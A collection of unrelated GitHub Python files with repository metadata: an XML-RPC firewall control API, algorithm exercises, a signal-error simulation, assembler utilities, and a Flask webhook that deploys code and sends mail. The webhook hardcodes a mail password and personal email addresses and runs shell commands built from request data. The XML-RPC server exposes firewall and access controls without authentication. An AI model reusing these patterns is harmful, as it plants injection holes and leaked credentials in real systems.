configparser.ConfigParser()\nconfig.read('config.ini')\n\nclass RequestHandler(SimpleXMLRPCRequestHandler):\n rpc_paths = ('/RPC2',)\n\nwith SimpleXMLRPCServer(('0.0.0.0', int(config['xml_api']['port'])),\n requestHandler=RequestHandler) as server:\n server.register_introspection_functions()\n\n # Trigger a firewall restart\n def reload_firewall():\n subprocess.run(['./fw_setup.py'])\n return True\n server.register_function(reload_firewall,'reload')\n\n # Activate User\n def add_time_restricted_access(mac_address, minutes):\n end_time = int(time.time()) + int(minutes) * 60\n file_object = open(config['xml_api']['activated_macs_file'], 'a')\n file_object.write(str(mac_address) + \" \" + str(end_time) + \"\\n\")\n file_object.close()\n return True\n server.register_function(add_time_restricted_access,'activate')\n\n # Clear List of Activated Users\n def clear_activated_users():\n file_object = open(config['xml_api']['activated_macs_file'], 'w')\n file_object.close()\n return True\n server.register_function(clear_activated_users,'clear_activations')\n\n # Renew blocked ips\n def set_blocked_targets(addresses):\n target_list = addresses.split()\n file_object = open(config['xml_api']['blocked_targets_file'], 'w')\n for ip in target_list:\n file_object.write(ip + \"\\n\")\n file_object.close()\n return True\n server.register_function(set_blocked_targets, 'block')\n\n 
# Run the server\n    server.serve_forever()\n","repo_name":"camelusferus/cpob","sub_path":"xmlrpcapi.py","file_name":"xmlrpcapi.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"759119913","text":"# # My solution\n# def solution(N, stages):\n#     stay = [0] * (N+1)\n#     result = []\n#     for stage in stages:\n#         stay[stage-1] += 1\n#     for i in range(len(stay)):\n#         if stay[i] == 0:\n#             result.append([i+1, 0])\n#         else:\n#             result.append([i+1, stay[i]/sum(stay[i:])])\n#     result.pop()\n#     result.sort(key = lambda x : (-x[1], x[0]))\n#     print([x[0] for x in result])\n#\n# solution(4, [4,4,4,4,4])\n\ndef solution(N, stages):\n    answer = []\n    length = len(stages)\n\n    for i in range(1, N+1):\n        count = stages.count(i)\n        if length == 0:\n            fail = 0\n        else:\n            fail = count / length\n        answer.append((i, fail))\n        length -= count\n    answer = sorted(answer, key=lambda t : t[1], reverse=True)\n    answer = [i[0] for i in answer]\n    return answer","repo_name":"HongGunWoo/Python-Programming-Team-Notes","sub_path":"정렬/실패율.py","file_name":"실패율.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6475859488","text":"import matplotlib.pyplot as plt\nimport math\nfrom numpy import random, array\nfrom random import randint\nfrom Transmitter import transmitter\nfrom NoiseChannel import NoiseChannel\nfrom Receiver import receiver\nfrom convolution import multiplethreading\n\ninputSize = int(raw_input('Enter the size of the input: '))\nsnrSize = int(raw_input('Enter size of SNR array: '))\nsnrArray = raw_input('Enter SNR array: ').split()\n\nfor i in range(snrSize):\n\tsnrArray[i] = int(snrArray[i])\n\ndigitalInput_X1 = []\nfor i in range(inputSize):\n\tdigitalInput_X1.append(randint(0,1))\n\ndigitalInput_X2 = []\nfor i in range(inputSize):\n\tdigitalInput_X2.append(randint(0,1))\n\n# Output of Transmitter\ntransmitSignal_X1, transmitSignal_X2 = transmitter(digitalInput_X1, digitalInput_X2, inputSize)\n\n#Output after impulse convolution\n#hValue = random.randn(2,2)\nhValue = array([[0.4,0.9],[0.5,0.8]])\nconvolved_X1, convolved_X2 = multiplethreading(transmitSignal_X1, transmitSignal_X2, hValue)\n\n# Output after noise addition\nnoisedSignal_X1, noisedSignal_X2 = NoiseChannel(convolved_X1, convolved_X2, inputSize, snrArray, snrSize)\n\n# Signal received at receiver and demodulated\nreceivedSignal_X1, receivedSignal_X2 = receiver(noisedSignal_X1, noisedSignal_X2, len(noisedSignal_X1), len(noisedSignal_X2), hValue)\n\nt = []\nfor i in xrange(len(receivedSignal_X1)/inputSize):\n\tt.append(receivedSignal_X1[i*inputSize:((i+1)*inputSize)])\nreceivedSignal_X1 = t\n\nt1 = []\nfor i in xrange(len(receivedSignal_X2)/inputSize):\n\tt1.append(receivedSignal_X2[i*inputSize:((i+1)*inputSize)])\nreceivedSignal_X2 = t1\n\n#print '\\n', receivedSignal_X1, '\\n', receivedSignal_X2\n#print '\\n', digitalInput_X1, '\\n', digitalInput_X2\n# Error per SNR calculations\n\nerr_X1 = []\nerr_X2 = []\nfor i in range(len(receivedSignal_X1)):\n    l = [0]*inputSize\n    for j in range(len(digitalInput_X1)):\n    \tl[j] = abs(receivedSignal_X1[i][j] - digitalInput_X1[j])\n    err_X1.append(sum(l))\n#print err_X1\nfor i in range(len(receivedSignal_X2)):\n    l = [0]*inputSize\n    for j in range(len(digitalInput_X2)):\n    \tl[j] = abs(receivedSignal_X2[i][j] - digitalInput_X2[j])\n    err_X2.append(sum(l))\n#print err_X2\nerr_X1[snrSize/2:] = err_X2[snrSize/2:]\n# Error per bit 
calculations\nfor i in range(len(err_X1)):\n\terr_X1[i] /= float(inputSize)\n\terr_X1[i] += 0.00005\n#print err_X1\nfor i in range(len(err_X2)):\n\terr_X2[i] /= float(inputSize)\n\n#print err_X2\n# Theoretical bit error rate calculation\nber = [0]*snrSize\nfor i in range(snrSize):\n\tber[i] = 0.5*math.erfc(math.sqrt(10**(snrArray[i]/10.0)))\n# Practical Plot1\nplt.figure(1)\nplt.semilogy(snrArray, err_X1, 'r')\n\n# Theoretical Plot\nplt.semilogy(snrArray, ber, 'b')\nplt.title('Theoretical/Practical BER Curve for X1')\nplt.xlabel('SNR per bit in dB')\nplt.ylabel('Bit Error Rate in dB')\nplt.legend(['Practical', 'Theoretical'],loc=3)\nplt.axis([snrArray[0],snrArray[-1],10**-5,10**0])\n\n# Practical Plot2\nplt.figure(2)\nplt.semilogy(snrArray, err_X2, 'r')\n\n# Theoretical Plot\nplt.semilogy(snrArray, ber, 'b')\nplt.title('Theoretical/Practical BER Curve for X2')\nplt.xlabel('SNR per bit in dB')\nplt.ylabel('Bit Error Rate in dB')\nplt.legend(['Practical', 'Theoretical'],loc=3)\nplt.axis([snrArray[0],snrArray[-1],10**-5,10**0])\n\nplt.show()","repo_name":"tarunlnmiit/wireless-modulations-btp","sub_path":"Module 2/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18086052910","text":"# -*- coding: utf-8 -*-\n\nimport string\nimport importlib\nimport re\nimport os\n\nimport capstone\nimport keystone\nimport unicorn\n\nfrom cemu.arch import Syntax, Endianness, \\\n    is_x86_16, is_x86_32, is_x86_64, is_x86, \\\n    is_arm, is_arm_thumb, is_aarch64, \\\n    is_mips, is_mips64, \\\n    is_sparc, is_sparc64, \\\n    is_ppc\n\n\ndef hexdump(source, length=0x10, separator='.', show_raw=False, base=0x00):\n    result = []\n    for i in range(0, len(source), length):\n        s = source[i:i+length]\n\n        hexa = ' '.join([\"%02X\" % c for c in s])\n        text = ''.join( [chr(c) if 0x20 <= c < 0x7F else separator for c in s] )\n\n        if show_raw:\n            result.append(hexa)\n        else:\n            result.append( \"%#-.*x %-*s %s\" % (16, base+i, 3*length, hexa, text) )\n\n    return '\\n'.join(result)\n\n\n\ndef format_address(addr, mode):\n    if mode.ptrsize == 2:\n        return \"%#.4x\" % (addr & 0xFFFF)\n    elif mode.ptrsize == 4:\n        return \"%#.8x\" % (addr & 0xFFFFFFFF)\n    elif mode.ptrsize == 8:\n        return \"%#.16x\" % (addr & 0xFFFFFFFFFFFFFFFF)\n\n\ndef get_arch_mode(lib, a):\n    arch = mode = endian = None\n\n    # x86\n    if is_x86_16(a):\n        if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_X86, keystone.KS_MODE_16, keystone.KS_MODE_LITTLE_ENDIAN\n        elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_X86, capstone.CS_MODE_16, capstone.CS_MODE_LITTLE_ENDIAN\n        else: arch, mode, endian = unicorn.UC_ARCH_X86, unicorn.UC_MODE_16, unicorn.UC_MODE_LITTLE_ENDIAN\n\n    elif is_x86_32(a):\n        if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_X86, keystone.KS_MODE_32, keystone.KS_MODE_LITTLE_ENDIAN\n        elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_X86, capstone.CS_MODE_32, capstone.CS_MODE_LITTLE_ENDIAN\n        else: arch, mode, endian = unicorn.UC_ARCH_X86, unicorn.UC_MODE_32, unicorn.UC_MODE_LITTLE_ENDIAN\n\n    elif is_x86_64(a):\n        if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_X86, keystone.KS_MODE_64, keystone.KS_MODE_LITTLE_ENDIAN\n        elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_X86, capstone.CS_MODE_64, capstone.CS_MODE_LITTLE_ENDIAN\n        else: arch, mode, endian = unicorn.UC_ARCH_X86, unicorn.UC_MODE_64, unicorn.UC_MODE_LITTLE_ENDIAN\n\n    # arm\n    elif is_arm(a):\n        if lib==\"keystone\": 
arch, mode, endian = keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_ARM, unicorn.UC_MODE_ARM, unicorn.UC_MODE_LITTLE_ENDIAN\n elif is_arm_thumb(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_ARM, keystone.KS_MODE_THUMB, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_ARM, capstone.CS_MODE_THUMB, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_ARM, unicorn.UC_MODE_THUMB, unicorn.UC_MODE_LITTLE_ENDIAN\n\n # aarch64\n elif is_aarch64(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_ARM64, 0, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_ARM64, capstone.CS_MODE_ARM, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_ARM64, unicorn.UC_MODE_ARM, unicorn.UC_MODE_LITTLE_ENDIAN\n\n # powerpc (uncomment when unicorn supports ppc)\n # elif is_ppc(m):\n # if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_PPC, keystone.KS_MODE_PPC32, keystone.KS_MODE_BIG_ENDIAN\n # elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_PPC, 0, capstone.CS_MODE_BIG_ENDIAN\n # else: arch, mode, endian = unicorn.UC_ARCH_PPC, unicorn.UC_MODE_PPC32, unicorn.UC_MODE_BIG_ENDIAN\n\n # mips/mips64\n elif is_mips(a):\n if a.endianness==Endianness.LITTLE:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS32, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS32, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS32, unicorn.UC_MODE_LITTLE_ENDIAN\n else:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS32, keystone.KS_MODE_BIG_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS32, capstone.CS_MODE_BIG_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS32, unicorn.UC_MODE_BIG_ENDIAN\n elif is_mips64(a):\n if a.endianness==Endianness.LITTLE:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS64, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS64, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS64, unicorn.UC_MODE_LITTLE_ENDIAN\n else:\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_MIPS, keystone.KS_MODE_MIPS64, keystone.KS_MODE_BIG_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_MIPS, capstone.CS_MODE_MIPS64, capstone.CS_MODE_BIG_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_MIPS, unicorn.UC_MODE_MIPS64, unicorn.UC_MODE_BIG_ENDIAN\n\n # sparc/sparc64\n elif is_sparc(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_SPARC, keystone.KS_MODE_SPARC32, keystone.KS_MODE_LITTLE_ENDIAN\n elif lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_SPARC, 0, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_SPARC, unicorn.UC_MODE_SPARC32, unicorn.UC_MODE_LITTLE_ENDIAN\n elif is_sparc(a):\n if lib==\"keystone\": arch, mode, endian = keystone.KS_ARCH_SPARC, keystone.KS_MODE_SPARC64, keystone.KS_MODE_LITTLE_ENDIAN\n elif 
lib==\"capstone\": arch, mode, endian = capstone.CS_ARCH_SPARC, 0, capstone.CS_MODE_LITTLE_ENDIAN\n else: arch, mode, endian = unicorn.UC_ARCH_SPARC, unicorn.UC_MODE_SPARC64, unicorn.UC_MODE_LITTLE_ENDIAN\n\n if arch is None and mode is None and endian is None:\n raise Exception(\"Failed to get architecture parameter from mode\")\n\n return arch, mode, endian\n\n\ndef disassemble(raw_data, mode):\n arch, mode, endian = get_arch_mode(\"capstone\", mode)\n cs = capstone.Cs(arch, mode | endian)\n if is_x86(mode) and mode.syntax == Syntax.ATT:\n cs.syntax = capstone.CS_OPT_SYNTAX_ATT\n\n insns = [\"{:s} {:s}\".format(i.mnemonic, i.op_str) for i in cs.disasm(bytes(raw_data), 0x4000)]\n return \"\\n\".join(insns)\n\n\ndef disassemble_file(fpath, mode):\n with open(fpath, 'rb') as f:\n raw_data = f.read()\n\n return disassemble(raw_data, mode)\n\n\ndef assemble(asm_code, mode):\n \"\"\"\n Helper function to assemble code receive in parameter `asm_code` using Keystone.\n\n @param asm_code : assembly code in bytes (multiple instructions must be separated by ';')\n @param mode : defines the mode to use Keystone with\n @return a tuple of bytecodes as bytearray, along with the number of instruction compiled. If failed, the\n bytearray will be empty, the count of instruction will be the negative number for the faulty line.\n \"\"\"\n arch, mode, endian = get_arch_mode(\"keystone\", mode)\n ks = keystone.Ks(arch, mode | endian)\n if is_x86(mode) and mode.syntax == Syntax.ATT:\n ks.syntax = keystone.KS_OPT_SYNTAX_ATT\n\n try:\n bytecode, cnt = ks.asm(asm_code, as_bytes=True)\n except keystone.keystone.KsError as kse:\n return (b'', kse.get_asm_count())\n\n return (bytecode, cnt)\n\n\ndef ishex(x):\n if x.startswith(\"0x\") or x.startswith(\"0X\"):\n x = x[2:]\n return all([c in string.hexdigits for c in x])\n\n\ndef list_available_plugins():\n pysearchre = re.compile('.py$', re.IGNORECASE)\n pluginfiles = filter(pysearchre.search,\n os.listdir(os.path.join(os.path.dirname(__file__), \"plugins\")))\n form_module = lambda fp: os.path.splitext(fp)[0]\n plugins = map(form_module, pluginfiles)\n for plugin in plugins:\n if not plugin.startswith('__'):\n yield plugin\n return\n\n\ndef load_plugin(plugin):\n mod = None\n\n try:\n mod = importlib.import_module(\"cemu.plugins.{}\".format(plugin))\n except ImportError as ie:\n print(\"Failed to import '{}' - reason: {}\".format(plugin, ie))\n return None\n\n return mod\n","repo_name":"GatoAmarilloBicolor/cemu","sub_path":"cemu/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"23063375961","text":"import math\n \nclass Graph(object):\n def __init__(self, n, Fgraph):\n self.nodes = n\n self.graph = self.simmetric(nodes, Fgraph)\n \n def simmetric(self, nodes, Fgraph):\n graph = {}\n for node in nodes:\n graph[node] = {}\n graph.update(Fgraph)\n for node, edges in graph.items():\n for AdjacentNode, value in edges.items():\n if graph[AdjacentNode].get(node, False) == False:\n graph[AdjacentNode][node] = value\n return graph\n \n def GettingEdges(self, node):\n connections = []\n for out_node in self.nodes:\n if self.graph[node].get(out_node, False) != False:\n connections.append(out_node)\n return connections\n\ndef DijkstraAlgorithm(graph, StartNode):\n UnvisitedNodes = list(graph.nodes)\n ShortestPath = {}\n PreviousNodes = {} \n MaxValue = math.inf\n for node in UnvisitedNodes:\n ShortestPath[node] = MaxValue\n ShortestPath[StartNode] = 0\n 
while UnvisitedNodes:\n CurrentMin = None\n for node in UnvisitedNodes:\n if CurrentMin == None:\n CurrentMin = node\n elif ShortestPath[node] < ShortestPath[CurrentMin]:\n CurrentMin = node\n neighbors = graph.GettingEdges(CurrentMin)\n for neighbor in neighbors:\n TentativeValue = ShortestPath[CurrentMin] + graph.graph[CurrentMin][neighbor]\n if TentativeValue < ShortestPath[neighbor]:\n ShortestPath[neighbor] = TentativeValue\n PreviousNodes[neighbor] = CurrentMin\n UnvisitedNodes.remove(CurrentMin)\n \n return PreviousNodes, ShortestPath\n\ndef print_result(PreviousNodes, ShortestPath, StartNode, TargetNode):\n path = []\n node = TargetNode\n \n while node != StartNode:\n path.append(node)\n node = PreviousNodes[node]\n path.append(StartNode)\n \n print(\"Длина короткого маршрута: {}.\".format(ShortestPath[TargetNode]))\n print(\"Короткий путь: \" + \" -> \".join(reversed(path)))\n\nnodes = ['A', 'B', 'C', 'D', 'E', 'F','G']\n \nGraphEdges = {}\nfor node in nodes:\n GraphEdges[node] = {}\n \nGraphEdges['A']['B'] = 7\nGraphEdges['A']['C'] = 1\nGraphEdges['A']['G'] = 3\nGraphEdges['B']['E'] = 3\nGraphEdges['C']['D'] = 4\nGraphEdges['D']['E'] = 4\nGraphEdges['D']['F'] = 2\nGraphEdges['D']['G'] = 2\nGraphEdges['E']['F'] = 5\nGraphEdges['D']['G'] = 2\n\n\ngraph = Graph(nodes, GraphEdges)\n\nPreviousNodes, ShortestPath = DijkstraAlgorithm(graph=graph, StartNode='A')\n\nprint_result(PreviousNodes, ShortestPath, StartNode='A', TargetNode='F')\n","repo_name":"Ksenia1611/Labs","sub_path":"lab5/Lab5.py","file_name":"Lab5.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19395999335","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport datetime\r\nimport shutil\r\nimport subprocess\r\nfrom subprocess import Popen, PIPE\r\nimport json\r\nfrom threading import Thread\r\n\r\nfrom flask import Flask, request, render_template\r\nfrom flask_mail import Mail, Message\r\n\r\napp = Flask(__name__)\r\n\r\nmail = Mail(app)\r\n\r\napp.config['MAIL_SERVER'] = 'mail.heclouds.com'\r\napp.config['MAIL_PORT'] = 25\r\napp.config['MAIL_USERNAME'] = 'boer'\r\napp.config['MAIL_PASSWORD'] = 'Admin@123'\r\n\r\napp.config['CHECKOUT_DIR'] = '/data/deployment/gitrepos'\r\napp.config['DEPLOY_DIR'] = '/data/deployment/deploydir'\r\napp.config['PROJECTS_DIR'] = '/data/deployment/projects'\r\n\r\ndef update_repo(repo_path, repo_url, commit_id):\r\n git_path = os.path.join(repo_path, '.git')\r\n if os.path.exists(git_path) and os.path.isdir(git_path):\r\n cmd = 'cd %s && git reset --hard origin/master && git pull -q' % repo_path\r\n rc = subprocess.check_call(cmd, shell=True, cwd=repo_path)\r\n else:\r\n if os.path.exists(os.path.dirname(repo_path)) and os.path.isdir(os.path.dirname(repo_path)):\r\n shutil.rmtree(os.path.dirname(repo_path))\r\n else:\r\n os.makedirs(os.path.dirname(repo_path))\r\n cmd = 'git clone -q %s' % repo_url\r\n rc = subprocess.check_call(cmd.split(), cwd=os.path.dirname(repo_path))\r\n # 指定commit_id\r\n cmd = 'git reset -q --hard %s' % commit_id\r\n rc = subprocess.check_call(cmd.split(), cwd=repo_path)\r\n \r\ndef rsync_local(src, dest, excludes=[]):\r\n excludes.append('.git')\r\n exclude_args = ''\r\n for e in excludes:\r\n exclude_args = exclude_args + ' --exclude %s' % e\r\n cmd = 'rsync -qa --delete %s %s%s %s%s' % (exclude_args, src, os.sep, dest, os.sep)\r\n rc = subprocess.check_call(cmd.split())\r\n\r\ndef chk_and_set_exe(src_path):\r\n if not os.access(src_path, os.X_OK):\r\n 
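The Lab5 Dijkstra above selects the next node with a linear scan over every unvisited node, which is O(V^2) overall. A sketch of the same relaxation loop with a binary heap, the approach the Baekjoon 4485 record further on also takes; the toy graph literal is illustrative only:

import heapq

def dijkstra(adj, start):
    # adj: {node: {neighbor: edge_weight, ...}, ...}
    dist = {node: float("inf") for node in adj}
    dist[start] = 0
    heap = [(0, start)]
    while heap:
        d, node = heapq.heappop(heap)
        if d > dist[node]:
            continue  # stale heap entry; node was already relaxed via a shorter path
        for nxt, w in adj[node].items():
            if d + w < dist[nxt]:
                dist[nxt] = d + w
                heapq.heappush(heap, (dist[nxt], nxt))
    return dist

print(dijkstra({'A': {'B': 7, 'C': 1}, 'B': {}, 'C': {'B': 2}}, 'A'))  # {'A': 0, 'B': 3, 'C': 1}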
os.chmod(src_path, 755)\r\n\r\ndef exec_script(script_file):\r\n if os.path.exists(script_file) and os.path.isfile(script_file):\r\n chk_and_set_exe(script_file)\r\n outputs = subprocess.check_output(script_file, shell=True)\r\n # p = Popen(script_file, stdout=PIPE)\r\n # c_pid = p.pid\r\n # outputs = p.communicate()[0]\r\n # rc = p.poll()\r\n #if rc == 0:\r\n # p.terminate()\r\n #else:\r\n # p.kill()\r\n return outputs\r\n \r\n\r\n# 同步邮件\r\ndef send_sync_email(sender, to, cc, subject, template, **kwargs):\r\n msg = Message(subject, sender=sender, recipients=to, cc=cc)\r\n # msg.body = render_template(template + '.txt', **kwargs)\r\n msg.html = render_template(template + '.html', **kwargs)\r\n mail.send(msg)\r\n\r\n# 异步发邮件\r\ndef send_async_email(app, msg):\r\n with app.app_context():\r\n mail.send(msg)\r\n\r\ndef send_email(sender, to, cc, subject, template, **kwargs):\r\n msg = Message(subject, sender=sender, recipients=to, cc=cc)\r\n # msg.body = render_template(template + '.txt', **kwargs)\r\n msg.html = render_template(template + '.html', **kwargs)\r\n thr = Thread(target=send_async_email, args=[app, msg])\r\n thr.start()\r\n return thr \r\n\r\n@app.route('/sendmail')\r\ndef sendmail():\r\n user_email_map = {\r\n 'zhanghaibo': 'boer0924@qq.com',\r\n 'mazhijie': '528254060@qq.com',\r\n 'jieyuanfei': 'j.2ue@qq.com',\r\n 'weizhengdong': '970250137@qq.com',\r\n 'tanjiang': '289801415@qq.com',\r\n 'chenbo': '150339480@qq.com'\r\n }\r\n send_email('boer@heclouds.com', ['528254060@qq.com', 'j.2ue@qq.com', 'boer0924@qq.com'], ['289801415@qq.com', '150339480@qq.com'], 'Just a test', 'deploy')\r\n # msg = Message('Hello', sender=\"boer0924@hotmail.com\", recipients=['boer0924@qq.com'])\r\n # msg.body = \"testing\"\r\n # mail.send(msg)\r\n return 'done'\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef index():\r\n if request.method == 'POST':\r\n results = json.loads(request.data)\r\n noteable_type = results['object_attributes']['noteable_type']\r\n # Triggered when a new comment is made on commits, merge requests, issues, and code snippets. 
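One caveat about chk_and_set_exe above: os.chmod(src_path, 755) passes decimal 755, i.e. octal 1363, not the intended rwxr-xr-x. A corrected sketch using stat constants (make_executable is a hypothetical helper name, not part of the deployment script):

import os
import stat

def make_executable(path):
    # The equivalent of `chmod +x`: OR the execute bits into the existing mode.
    mode = os.stat(path).st_mode
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)

print(oct(755), oct(0o755))  # 0o1363 vs 0o755 -- why the decimal literal misbehaves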
\r\n if noteable_type != 'Commit':\r\n return '', 404\r\n # user 相关\r\n name = results['user']['name']\r\n username = results['user']['username']\r\n if username != 'zhanghaibo':\r\n return '', 403\r\n # repository 相关\r\n repo_name = results['repository']['name']\r\n repo_url = results['repository']['url']\r\n repo_path = git_path = os.path.join(app.config['CHECKOUT_DIR'], repo_name, repo_name)\r\n # commit 相关\r\n commit_id = results['commit']['id']\r\n print('---commit_id---', commit_id)\r\n commit_msg = results['commit']['message'].strip('\\n')\r\n # object_attributes 相关\r\n try:\r\n notes = results['object_attributes']['note']\r\n if not notes.startswith('```json') and not notes.endswith('```'):\r\n return ''\r\n notes = notes.lstrip('```json').rstrip('```').replace('\\r\\n', '') \r\n notes = json.loads(notes)\r\n except Exception as e:\r\n print('<-debug->', e)\r\n # send_email()\r\n return ''\r\n deploy_type = notes.get('deploy_type')\r\n recipients = notes.get('recipients')\r\n carbon_copy = notes.get('carbon_copy')\r\n functions = notes.get('functions')\r\n\r\n update_repo(repo_path, repo_url, commit_id)\r\n rsync_local(repo_path, os.path.join(app.config['DEPLOY_DIR'], repo_name, repo_name))\r\n\r\n script_file = ''\r\n subject = ''\r\n if deploy_type == 'weekfix':\r\n script_file = os.path.join(app.config['PROJECTS_DIR'], repo_name + '_weekfix', 'script/local_after.sh')\r\n subject = datetime.datetime.strftime(datetime.date.today(), '%Y/%m/%d') + 'weekfix测试'\r\n elif deploy_type == 'hotfix':\r\n pass\r\n elif deploy_type == 'feature':\r\n pass\r\n elif deploy_type == 'prod':\r\n pass\r\n else:\r\n print('滚蛋吧')\r\n outputs = exec_script(script_file)\r\n print(outputs)\r\n print(type(outputs))\r\n send_sync_email('boer@heclouds.com', recipients, carbon_copy, subject, 'deploy', functions=functions, outputs=outputs)\r\n return ''\r\n return '', 405\r\n\r\nif __name__ == '__main__':\r\n app.run(host='172.19.3.23', port=8080)\r\n# {\r\n# \"deploy_type\": \"weekfix/feature/hotfix/prod\",\r\n# \"recipients\": [\"mazhijie\", \"limao\", \"dengdeng\"],\r\n# \"carbon_copy\": [\"bmwlee\", \"limao\"],\r\n# \"functions\": [\r\n# {\r\n# \"name\": \"功能点一\",\r\n# \"content\": \"balabala~\"\r\n# },\r\n# {\r\n# \"name\": \"功能点二\",\r\n# \"content\": \"balabala~\"\r\n# }\r\n# ]\r\n# }\r\n\r\n# onenet_v3\r\n# onenet_ee\r\n# forum_v2\r\n# passport\r\n# phpcorelib\r\n# groupservice\r\n# admin_onenetv3\r\n# campaignmap","repo_name":"boer0924/BoerOPS","sub_path":"app/utils/sendemail.py","file_name":"sendemail.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"424457005","text":"# 백준 4485 녹색 옷 입은 애가 젤다지?\n\nimport sys, heapq\n\ndef dijkstra():\n global amount\n\n heap = []\n heapq.heappush(heap, (amount[0][0], 0, 0))\n \n while heap:\n min_val, x, y = heapq.heappop(heap)\n\n if x == N-1 and y == N-1:\n return\n \n for dx, dy in dxy:\n nx, ny = x+dx, y+dy\n\n if 0 <= nx < N and 0 <= ny < N and amount[nx][ny] > min_val + cave[nx][ny]:\n amount[nx][ny] = min_val + cave[nx][ny]\n heapq.heappush(heap, (amount[nx][ny], nx, ny))\n\n\ninput = sys.stdin.readline\n\ni = 1\nwhile True:\n N = int(input())\n\n if not N:\n break\n\n cave = [list(map(int, input().split())) for _ in range(N)]\n \n dxy = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n\n amount = [[float('inf') for _ in range(N)] for _ in range(N)]\n amount[0][0] = cave[0][0]\n\n dijkstra()\n\n print(f'Problem {i}: {amount[N-1][N-1]}')\n i += 
1","repo_name":"kimhyeongjun95/AlgoPullgo","sub_path":"038주차/녹색 옷 입은 애가 젤다지/hyunseo.py","file_name":"hyunseo.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"40106072711","text":"#!/usr/bin/python3\nclass Square:\n 'Square object class'\n\n def __init__(self, size=0):\n 'Initialize data'\n if isinstance(size, int) is not True:\n raise TypeError(\"size must be an integer\")\n if size < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = size\n\n @property\n def size(self):\n return self.__size\n\n @size.setter\n def size(self, value):\n 'Method to set self.__size'\n if isinstance(value, int) is False:\n raise TypeError(\"size must be an integer\")\n self.__size = value\n\n def area(self):\n 'Method to square self.__size'\n if isinstance(self.__size, int) is not True:\n raise TypeError(\"size must be an integer\")\n if self.__size < 0:\n raise ValueError(\"size must be >= 0\")\n return self.__size**2\n","repo_name":"jarehec/holbertonschool-higher_level_programming","sub_path":"0x07-python-classes/4-square.py","file_name":"4-square.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42697365940","text":"from django.shortcuts import render, get_object_or_404, HttpResponse\nfrom django.views.generic import View, DetailView, ListView\nfrom dealers.models import Dealer\nfrom .forms import DealerForm\nfrom django.shortcuts import redirect, reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\n\nclass DealerCreate(View):\n\n @method_decorator(login_required)\n def get(self, request):\n context = {'form':DealerForm}\n return render(request, 'dealers/dealer_create.html', context)\n\n @method_decorator(login_required)\n def post(self, request):\n form = 